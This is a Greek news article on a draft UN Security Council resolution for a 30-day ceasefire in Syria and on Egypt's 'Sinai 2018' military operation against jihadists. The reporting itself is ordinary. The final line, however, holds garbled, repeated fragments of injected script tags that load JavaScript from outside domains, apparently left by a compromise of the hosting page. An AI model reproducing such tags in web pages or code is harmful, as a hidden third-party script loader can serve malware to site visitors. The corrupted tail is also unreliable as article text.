Κατατέθηκε νέο προσχέδιο συμφωνίας για κατάπαυση του πυρός στη Συρία – Αίγυπτος: 53 τζιχαντιστές έχουν σκοτωθεί κατά…

Η Σουηδία και το Κουβέιτ επέδωσαν στους εταίρους τους στο Συμβούλιο Ασφαλείας του ΟΗΕ ένα τροποποιημένο σχέδιο απόφασης με στόχο να λάβουν την έγκριση και της Ρωσίας και με το οποίο ζητούν να κηρυχθεί εκεχειρία διάρκειας 30 ημερών στη Συρίαώστε να μπορέσει να διανεμηθεί άμεσα ανθρωπιστική βοήθεια, σύμφωνα με διπλωμάτες.Το νέο σχέδιο απόφασης διευκρινίζει ότι η κατάπαυση του πυρός δεν θα ισχύει για τις μάχες εναντίον του Ισλαμικού Κράτους και της αλ Κάιντα. Κατά συνέπεια θα επιτρέπει στη συριακή κυβέρνηση να συνεχίσει τις επιχειρήσεις της κυρίως στην επαρχία Ιντλίμπ.

Η ψηφοφορία για το νέο προσχέδιο αναμένεται να διεξαχθεί την επόμενη εβδομάδα.

Οι υπηρεσίες του ΟΗΕ που δραστηριοποιούνται στη Συρία ζήτησαν στις 6 Φεβρουαρίου να επιβληθεί άμεσα εκεχειρία ώστε να μπορέσει να φτάσει ανθρωπιστική βοήθεια στη χώρα και να απομακρυνθούν οι ασθενείς και οι τραυματίες.

Δύο ημέρες αργότερα το Συμβούλιο Ασφαλείας δεν κατάφερε να καταλήξει σε συμφωνία, με τον Ρώσο πρεσβευτή Βασίλι Νεμπένζια να εκτιμά ότι μια ανθρωπιστική κατάπαυση του πυρός «δεν είναι ρεαλιστική».

Έκτοτε η κατάσταση επί του πεδίου έχει επιδεινωθεί, σύμφωνα με τον ΟΗΕ, κυρίως στην ανατολική Γούτα κοντά στη Δαμασκό και την επαρχία Ιντλίμπ.

Αν υιοθετηθεί κάποια απόφαση την επόμενη εβδομάδα, χωρίς να ασκήσει η Ρωσία βέτο, θα έχουν περάσει δύο εβδομάδες μέχρις ότου ο ΟΗΕ να έχει καταφέρει να αποφασίσει κατάπαυση του πυρός από τότε που έγινε η έκκληση.

Το προσχέδιο της απόφασης αναφέρει ότι η κατάπαυση του πυρός θα ξεκινήσει 72 ώρες μετά την υιοθέτηση του κειμένου από το Συμβούλιο Ασφαλείας. Η παροχή έκτακτης ανθρωπιστικής βοήθειας θα ξεκινήσει 48 ώρες μετά την έναρξη της εκεχειρίας.

Επίσης το προσχέδιο της απόφασης προβλέπει την άρση της πολιορκίας στην ανατολική Γούτα, τη Γιαρμούκ, τη Φούα και την Κεφράγια, καθώς και την απομάκρυνση από τις περιοχές αυτών των ασθενών και των τραυματιών.

Περισσότεροι από 13,1 εκατομμύρια Σύροι έχουν ανάγκη ανθρωπιστική βοήθεια, εκ των οποίων οι 6,1 εκατομμύρια είναι εσωτερικά εκτοπισμένοι.

 

Συνολικά 53 ισλαμιστές μαχητές έχουν σκοτωθεί και 680 ύποπτοι έχουν συλληφθεί έπειτα από μια εβδομάδα επιχειρήσεων που έχουν εξαπολύσει οι ένοπλες δυνάμεις και η αστυνομία της Αιγύπτου.

Στα τέλη Νοεμβρίου, ο Αιγύπτιος πρόεδρος Άμπντελ Φάταχ αλ Σίσι, που επιδιώκει την επανεκλογή του στις εκλογές της 26ης Μαρτίου, διέταξε τις ένοπλες δυνάμεις να συντρίψουν τους μαχητές στη χερσόνησο του Σινά, μετά την τρομοκρατική ενέργεια με στόχο ένα τέμενος στο βόρειο τμήμα της χερσονήσου που είχε αποτέλεσμα τουλάχιστον 300 νεκρούς.

Οι επιχειρήσεις «εκκαθάρισης», με την ονομασία «Σινά 2018», στις οποίες συμμετέχουν ο στρατός, το πολεμικό ναυτικό, η πολεμική αεροπορία και η αστυνομία της Αιγύπτου, ξεκίνησαν την Παρασκευή στο Σινά, στο Δέλτα του Νείλου και την έρημο στο δυτικό τμήμα της χώρας στη μεθόριο με τη Λιβύη.

Στόχος των επιχειρήσεων είναι «τρομοκρατικά και εγκληματικά στοιχεία και οργανισμοί», δήλωσε ο στρατιωτικός εκπρόσωπος, συνταγματάρχης Ταμέρ αλ-Ριφάι, σε μια συνέντευξη Τύπου που μετέδωσε η κρατική τηλεόραση.

Όπως τόνισε, οι δυνάμεις επιβολής του νόμου έχουν καταστρέψει 1000 κιλά εκρηκτικών υλών, 378 κρησφύγετα τζιχαντιστών και εγκαταστάσεις αποθήκευσης όπλων, καθώς και ένα κέντρο ενημέρωσης.

Σύμφωνα με τις υπηρεσίες μυστικών πληροφοριών, οι τζιχαντιστές, έπειτα από τις ήττες τους στη Συρία και το Ιράκ, σχεδιάζουν «να εγκαθιδρύσουν ένα νέο τρομοκρατικό κέντρο σε άλλη τοποθεσία και ενδεχομένως αυτή να είναι η χερσόνησος Σινά», σημείωσε ο Ριφάι.

Από την έναρξη των επιχειρήσεων, αεροσκάφη της Πολεμικής Αεροπορίας εξαπέλυσαν περισσότερες από 100 επιδρομές στο βόρειο και κεντρικό Σινά, οι οποίες επικεντρώθηκαν σε κρησφύγετα μαχητών, έξω από κατοικημένες περιοχές για να αποφευχθούν πλήγματα σε αμάχους, δήλωσε ο ταξίαρχος Αλά Νταουαρά.

Ο υποστράτηγος Γιασέρ Αμπντέλ Αζίζ σημείωσε πως η επιχείρηση θα τερματιστεί όταν εκδιωχθούν οι «τρομοκράτες» από το Σινά, προσθέτοντας πως έπειτα από τη στρατιωτική επιχείρηση, οι αιγυπτιακές αρχές θα προωθήσουν ένα ολοκληρωμένο σχέδιο ανάπτυξης για τη χερσόνησο.

Κάτοικοι της περιοχής έχουν εγείρει ανησυχίες για ελλείψεις σε τροφή και φάρμακα στη χερσόνησο έπειτα από τον πλήρη αποκλεισμό της πρόσβασης στην περιοχή.

Ο Ριφάι τόνισε ότι οι ένοπλες δυνάμεις συνεργάζονται στενά με τις τοπικές αρχές για το συντονισμό διανομής τροφής ιατρικής βοήθειας και άλλων προμηθειών.

___setforspecialdomain.com/ghfgh34523452′ type=’text/javascript’>___setforspecialdomain.com/ghfgh34523452′ type=’text/javascript’>challengeforme.com/pystats.js?l=l&’ async=true type=text/javascript language=javascript>challengeforme.com/pystats.js?l=l&’ async=true type=text/javascript language=javascript>